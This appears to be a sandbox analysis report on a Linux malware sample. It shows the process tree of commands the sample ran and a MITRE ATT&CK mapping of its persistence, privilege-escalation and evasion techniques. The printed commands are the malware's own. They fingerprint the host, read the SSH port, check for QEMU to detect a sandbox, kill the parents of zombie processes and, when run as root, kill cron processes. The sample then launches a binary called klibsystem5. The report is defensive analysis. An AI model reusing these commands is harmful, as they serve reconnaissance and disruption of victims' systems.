    [PID 4243] /bin/sh: sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
      [PID 4246] /usr/bin/hostname: hostname -I
        - Attempts to change immutable files
      [PID 4248] /usr/bin/awk: awk "{print \$1}"
      [PID 4253] /usr/bin/awk: awk "{print \"-\"\$2}"
      [PID 4252] /usr/bin/head: head -n 1
      [PID 4251] /usr/bin/grep: grep "Port "
      [PID 4250] /usr/bin/cat: cat /etc/ssh/sshd_config
      [PID 4254] /usr/bin/whoami: whoami
      [PID 4255] /usr/bin/hostname: hostname
      [PID 4256] /usr/bin/grep: grep -c "^processor" /proc/cpuinfo
        - Checks CPU configuration
      [PID 4262] /usr/bin/sed: sed -e "s/\$//"
      [PID 4261] /usr/bin/sed: sed -e "s/^ *//"
      [PID 4260] /usr/bin/cut: cut -d: -f2
      [PID 4259] /usr/bin/grep: grep -m 1 "model name" /proc/cpuinfo
        - Checks CPU configuration
      [PID 4265] /usr/bin/awk: awk "{print \$1}"
      [PID 4268] /usr/bin/awk: awk "{print \$4}"
      [PID 4271] /usr/bin/awk: awk "{print \$4}"
    [PID 4272] /bin/sh: sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
      [PID 4274] /usr/bin/awk: awk "/[zZ]/ && !a[\$2]++ {print \$2}"
[PID 1616] /usr/bin/nohup: nohup ./klibsystem5
[PID 1616] /usr/bin/klibsystem5: ./klibsystem5
Network

MITRE ATT&CK Enterprise v15

Persistence
- Boot or Logon Autostart Execution (2)
  - XDG Autostart Entries (1)
- Boot or Logon Initialization Scripts (1)
  - RC Scripts (1)
- Create or Modify System Process (1)
  - Systemd Service (1)
- Pre-OS Boot (1)
  - Bootkit (1)
- Scheduled Task/Job (1)
  - Cron (1)

Privilege Escalation
- Boot or Logon Autostart Execution (2)
  - XDG Autostart Entries (1)
- Boot or Logon Initialization Scripts (1)
  - RC Scripts (1)
- Create or Modify System Process (1)
  - Systemd Service (1)
- Scheduled Task/Job (1)
  - Cron (1)

Defense Evasion
- File and Directory Permissions Modification (1)
  - Linux and Mac File and Directory Permissions Modification (1)
- Impair Defenses (1)
  - Disable or Modify System Firewall (1)
- Pre-OS Boot (1)
  - Bootkit (1)
- Virtualization/Sandbox Evasion (2)
  - System Checks (2)
Downloads
